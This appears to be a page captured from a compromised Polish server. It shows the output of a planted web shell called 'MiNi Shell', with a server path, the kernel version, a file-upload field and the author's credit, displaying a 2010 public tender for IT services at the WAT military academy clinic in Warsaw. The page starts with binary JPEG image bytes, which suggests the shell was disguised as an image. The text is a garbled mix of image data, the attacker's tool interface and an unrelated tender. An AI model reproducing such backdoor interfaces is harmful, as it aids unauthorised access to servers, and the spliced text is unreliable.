JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100914/290898-N-2010.html

<p class="kh_header"><b>Warszawa: Usługi informatyczne dla Przychodni Lekarskiej WAT SP ZOZ w okresie 4 lat</b><br>
<b>Numer ogłoszenia: 290898 - 2010; data zamieszczenia: 14.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przychodnia Lekarska Wojskowej Akademii Technicznej Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kartezjusza 2, 01-480 Warszawa, woj. mazowieckie, tel. 022 6838281, 6838283, faks 022 6838224.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plwat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi informatyczne dla Przychodni Lekarskiej WAT SP ZOZ w okresie 4 lat.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przychodnia Lekarska WAT SP ZOZ w trybie przetargu nieograniczonego zamierza wyłonić 1 podmiot do świadczenia usług dziedzinie informatyki oraz obsługi systemów informatycznych wykorzystywanych w zakładach opieki zdrowotnej, w okresie 4 lat.
2.Wykonawca będzie zobowiązany do oddelegowania na stałe wykwalifikowanego pracownika lub pracowników do codziennego, (w dni robocze)zabezpieczenia działalności Zamawiającego, w jego siedzibie w godzinach (7:00 -20:00).
3.Zakres wymagań odnośnie świadczonych usług jest następujący: (punkty A i B wraz z podpunktami):
A. 1) Kompleksowe, bieżące raportowanie do Narodowego Funduszu Zdrowia (NFZ) i rozliczanie wykonywanych usług medycznych dla NFZ i innych płatników oraz personelu medycznego za pomocą istniejących systemów informatycznych Zamawiającego (platforma Magic, KS PPS, SZOI oraz SIMP). Rozliczanie, raportowanie i obsługa odbywa się dla następujących poradni i umów: 
 Podstawowa Opieka Zdrowotna (Lekarz POZ, Pielęgniarka POZ, nocna i    świąteczna pomoc ambulatoryjna, Transport),
Rehabilitacja Lecznicza,
Opieka Psychiatryczna i Leczenie Uzależnień,
Leczenie Stomatologiczne,
Chirurgia ogólna,
Ortopedia,
Dermatologia i Wenerologia,
Diabetologia,
Endokrynologia,
Gastroenterologia,
Położnictwo i Ginekologia,
Programy profilaktyczne,
Kardiologia,
Otolaryngologia,
Neurologia,
Okulistyka,
Urologia,
Laboratorium,
Pracownia RTG,
Pracownia USG,
umowy Medycyny Pracy (obecnie dla 15 płatników).
2) Kompleksowa, codzienna obsługa informatyczna i administrowanie serwerami i sieciami lokalnymi, opartymi na platformach NetWare 4, Windows 2003 Serwer oraz Linux (wkrótce).
3) Konserwacja i instalacja stanowisk komputerowych oraz codzienna obsługa i administrowanie programami informatycznymi służącymi do obsługi funkcjonowania Zamawiającego. Obecnie w Przychodni Lekarskiej WAT SP ZOZ obsługi wymaga 48 stanowisk komputerowych. W najbliższym czasie planowana jest rozbudowa sieci teleinformatycznej do obsługi w ramach zawieranej umowy do około 90 stanowisk.
B. Wykonawca zobowiązuje się do koordynowania działań zespołu personelu Zamawiającego, przy realizacji zadań związanych z kontraktowaniem świadczeń zdrowotnych z NFZ oraz realizacji zadań związanych z ewidencją w systemach informatycznych wykonanych świadczeń zdrowotnych. 
4.W zakresie usług, o których mowa w ust. 3 lit. A, ppkt 1, Wykonawca zobowiązany jest między innymi do:
1)obsługi programu Magic służącego do rejestrowania usług medycznych Zamawiającego, a w tym między innymi:
wprowadzania i usuwania w lokalnych systemach informatycznych danych zatrudnianego personelu medycznego z podaniem uprawnień wraz z konfiguracją usług jakie wykonują, 
wprowadzania i aktualizacji usług wraz z ich typami i kodami szczegółowymi,
generowanie eksportu wprowadzanych usług z zakresu POZ w celu zaimportowania ich w wymaganym przez NFZ formacie do systemu raportującego Zamawiającego,
generowanie eksportu wykonywanych usług z zakresu specjalistyki w celu zaimportowania ich w wymaganym przez NFZ formacie do systemu raportującego Zamawiającego,
bieżące generowanie zestawień podsumowujących, wymaganych przez dział księgowości m.in:
podsumowanie wykonanych punktów dla poszczególnych lekarzy,
podsumowanie usług zleconych przez poszczególnych lekarzy,
podsumowanie usług wykonanych przez lekarzy dla podmiotów medycyny   pracy (wzór raportu w zależności od aktualnej umowy z płatnikiem),
modyfikacji wyglądu raportów w systemie Magic w zależności od potrzeb, 
zestawienia wykonanych usług w zakresie medycyny pracy dla poszczególnych aktywnych płatników z podziałem na zakresy usług,
wprowadzania danych dodatkowych pacjentów, usług, kodów i płatników,
generowanie wydruków kolejek prowadzonych w systemie Magic,
informowanie osób merytorycznych o stwierdzonych błędach celem dokonania odpowiedniej korekty,
nadawanie i odbieranie uprawnień w programie dla personelu medycznego oraz rejestrującego usługi w zależności od wymagań  Zamawiającego,
aktualizacja programu do wymaganej wersji.
2)obsługi programu KS PPS, a w tym między innymi:
import zarejestrowanych usług POZ z programu Magic zgodnie z aktualnym Rapstat,
import zarejestrowanych usług specjalistyki z programu Magic zgodnie z aktualnym Rapstat,
generowanie i wysyłka raportów statystycznych za okres rozliczeniowy,
import raportów zwrotnych i ich weryfikacja,
generowanie i wysyłka raportów rozliczeniowych za okres rozliczeniowy dla poszczególnych umów,
import szablonów, i wysyłka wykonanych na ich podstawie faktur do systemu SZOI,
aktywacja deklaracji dla list POZ,
generowanie raportów list aktywnych pacjentów dla poszczególnych umów POZ i przekazywanie ich do systemu SZOI,
generacja raportów zbiorczych dla umów POZ,
generacja zestawień zbiorczych kwartalnych i półrocznych w zakresie wymaganym przez NFZ na podstawie informacji z systemu Magic i 3 niezależnych baz systemu KS-PPS,
generacja raportów o kolejkach oczekujących na podstawie informacji z systemu Magic oraz 3 niezależnych baz KS-PPS w celu wysłania ich jednym raportem do systemu SZOI,
wdrożenie i przystosowanie w zakresie wymaganym przez Zamawiającego istniejących niezależnych baz KS-PPS do rejestracji pacjentów i generacji raportów o kolejkach oczekujących,
aktualizacja umów i aneksów z NFZ w programie KS PPS,
bieżącej analizy błędów w raportach i współpracy z osobami merytorycznymi w celu dokonania odpowiednich korekt,
nadawanie i odbieranie uprawnień w programie dla personelu medycznego oraz rejestrującego usługi w zależności od wymagań Zamawiającego,
aktualizacja programu do wersji wymaganej przez NFZ,
5.W zakresie usług, o których mowa w ust. 3 lit. A, ppkt 2, Wykonawca zobowiązany jest między innymi do:
1)bieżącej administracji serwerami na platformach: NetWare, MS Windows 2003 server, Linux,
2)aktualizacji oprogramowania serwerów,
3)tworzenia kopii bezpieczeństwa i kontrola oprogramowania do tworzenia kopii, ,
4)przeglądanie logów w celu wykrycia nieprawidłowości w działaniu i ewentualnych zagrożeń oraz wszelkie czynności administracyjne,
5)kontrola spójności wolumenów,
6)kontrola pracy programów do zasilania awaryjnego (zarządzanie UPS),
7)audyt oprogramowania i sprzętu (1 raz w roku),
8)próba odzysku danych z kopii zapasowej ,
9)nadzorowanie z ramienia Zamawiającego, bezpiecznego przetwarzania danych osobowych w systemach informatycznych przez personel Zmawiającego, poprzez okresową analizę operacji wykonywanych na danych osobowych, takich jak zbieranie, utrwalanie, przechowywanie, opracowywanie, zmienianie, udostępnianie i usuwanie,
10)usuwanie lub nadzorowanie usuwania danych przez personel Zmawiającego, poprzez ich zniszczenie lub taką ich modyfikację, która nie pozwoli na ustalenie tożsamości osoby, której dane dotyczą,
11)z polecenia Zamawiającego, nadawania i odbierania wymaganego poziomu uprawnień dostępu do odpowiednich serwerów, 
12)występowania z wnioskiem do Zamawiającego, w sprawie wdrożenia stosownych środków technicznych i organizacyjnych zapewniających ochronę danych przed ich nieuprawnionym przetwarzaniem, a następnie nadzorowanie ich stosowania przez użytkowników sytemu informatycznego,
13)niezwłocznego informowania Zmawiającego o stwierdzonych nieprawidłowościach w przetwarzaniu danych osobowych przez użytkowników sytemu informatycznego, 
14)wdrażanie i konfiguracja usług informatycznych w nowo budowanej sieci informatycznej Zamawiającego w oparciu o zarządzane urządzenia aktywne klasy Hewlett Packard, Cisco lub równoważne.
6.W zakresie usług, o których mowa w ust. 3 lit. A, ppkt 3 Wykonawca zobowiązany jest między innymi do:
1)instalacji i konfiguracji nowych stanowisk komputerowych w siedzibie Zamawiającego (wraz ze wszystkimi potrzebnymi programami Zamawiającego,
2)z polecenia Zamawiającego, nadawania i odbierania uprawnień użytkownikom systemów informatycznych, do wykonywania czynności związanych z rejestracją usług medycznych oraz przetwarzaniem danych osobowych w systemach Zamawiającego, 
3)bieżącej obsługi i administracji programów Zamawiającego m.in: KS-PPS, Magic (medyczny-windows), Magic (finansowy-dos), Płatnik, ePFRON systemów SZOI, SIMP oraz kont internetowych i pocztowych,
4)wdrażanie i konfiguracja wszelkich nowych systemów informatycznych Zamawiającego w tym m.in: system finansowo-księgowy Magic (platforma Windows), serwer platforma Linux, rejestracji i raportowania wykonanych świadczeń zdrowotnych w oparciu o bazę ORACLE,
5)wdrożenie i przystosowanie systemów rejestracji medycznej i sprawozdawczości Zamawiającego zleceniodawcy (Magic, KS-PPS) do pełnej obsługi systemu kolejek pacjentów i automatycznej generacji raportów o kolejkach do systemu SZOI,
6)bieżąca pomoc informatyczna i odpowiedzi  na zapytania personelu Zamawiającego,
7)wdrożenie, konfiguracja i bieżąca administracja systemem poczty intranet w oparciu o istniejące serwery w celu komunikacji wewnętrznej Zamawiającego,
8)instalacja i aktualizacja systemów ochrony antywirusowej na stanowiskach,
9)bieżąca diagnostyka i naprawa uszkodzonych stanowisk komputerowych po otrzymaniu zgłoszenia,
10)okresowa kontrola spójności danych zapisanych na dyskach (za pomocą narzędzi własnych jak i systemowych),
11)okresowe testowanie dysków twardych (poprawność zapisu danych, sektory dysku) optymalizacja dysków twardych (defragmentacja),
12)kontrola antywirusowa (wykrywanie i usuwanie),
13)porządkowanie rejestrów systemów operacyjnych,
14)usuwanie zbędnych programów wskazanych przez użytkownika,
15)monitorowanie pracy komputerów (temp. procesora, kontrola poprawności zapisu i odczytu pamięci operacyjnej, itp.),
16)aktualizacja oprogramowania,
17)usuwanie błędów z systemu zawinionych przez użytkownika,
18)wnioskowanie do Zamawiającego o zakup/modernizację oprogramowania, systemów informatycznych, sprzętu informatycznego, które usprawnią przetwarzanie danych lub zabezpieczą przed ich utratą lub niemożnością odczytu. 
19)opiniowania propozycji Zamawiającego związanych z pkt. 18. 
Pozostałe wymagania Zamawiającego opisane są w projekcie umowy, który stanowi zał. Nr 6 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.24.50.00-4, 51.60.00.00-8, 50.31.20.00-5, 72.22.21.00-8, 72.22.80.00-9, 72.26.30.00-6, 72.31.20.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp według wzoru Zał. Nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W celu potwierdzenia warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia, Zamawiający wymaga: Wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług informatycznych według wzoru Zał. Nr 3 do SIWZ w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania  i odbiorców, oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie. Zamawiający wymaga wykazu świadczonych usług informatycznych łącznie w 2 zakresach:                                                                                                 1) raportowanie i rozliczanie świadczeń medycznych w systemach opartych na    platformie MAGIC i KS-PPS;
2) administracja serwerami Novell, Windows 2003 server i sieci teleinforma-tycznych, 
z załączeniem co najmniej 2 referencji od 2 odbiorców usług, potwierdzających należyte wykonywanie usług w 2 wymienionych wyżej zakresach łącznie lub min. po 1 referencji dla każdego wymaganego zakresu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp według wzoru Zał. Nr 2</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający wymaga złożenia wykazu osób, (według wzoru Zał. Nr 4), które będą oddelegowane do PL WAT SPZOZ wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami Kwalifikacje oddelegowanego lub oddelegowanych do pracy w Przychodni Lekarskiej WAT SP ZOZ informatyków muszą być potwierdzone kserokopiami następujących dokumentów, których złożenie Zamawiający dopuszcza także w języku angielskim: 
dyplom ukończenia Uczelni Wyższej w kierunku INFORMATYKA, 
dyplom lub certyfikat, potwierdzający odbycie szkoleń w zakresie konfiguracji urządzeń sieciowych (CISCO, HP)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający wymaga opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, o wartości nie mniejszej niż 50 000 PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z postanowieniami Art. 144 ust 1 ustawy Prawo zamówień publicznych przewiduje możliwość wprowadzenia istotnych zmian postanowień umowy, której strony nie mogły przewidzieć w dniu podpisania umowy, w następujących zakresach:
1)Wynagrodzenie Wykonawcy może ulec zmianie, 
a)gdy zostanie zmieniona stawka podatku VAT,
b)waloryzacja wynagrodzenia jest możliwa po upływie 1 roku od daty podpisania umowy na pisemny wniosek Wykonawcy, złożony przez Wykonawcę z co najmniej 30-dniowym wyprzedzeniem. Podstawą ewentualnej waloryzacji będzie ogłoszony przez GUS wskaźnik wzrostu cen i usług  konsumpcyjnych za okres ostatnich 12 miesięcy,
c)podstawą zmiany wynagrodzenia może być także istotna zmiana przedmiotu umowy, której to zmiany strony nie mogły przewidzieć w dniu podpisania umowy, a których wykonanie leży w interesie Zamawiającego. 
2) Zmiana zakresu i sposobu realizacji umowy z powodu: 
a)zmiany przepisów prawa,
b)zmiany wymagań NFZ i innych zleceniodawców świadczeń zdrowotnych,
c)zmian organizacyjnych u Zmawiającego lub zmiany adresu siedziby Wykonawcy oraz innych danych ujawnionych w rejestrach publicznych a także wymiany osoby lub osób realizujących zamówienie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.plwat.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PRZYCHODNIA LEKARSKA
Wojskowej Akademii Technicznej
Samodzielny Publiczny Zakład Opieki Zdrowotnej
01-480 Warszawa ul. Kartezjusza 2, pok. 411.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2010 godzina 09:00, miejsce: PRZYCHODNIA LEKARSKA
Wojskowej Akademii Technicznej
Samodzielny Publiczny Zakład Opieki Zdrowotnej
01-480 Warszawa ul. Kartezjusza 2, pok. 411.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com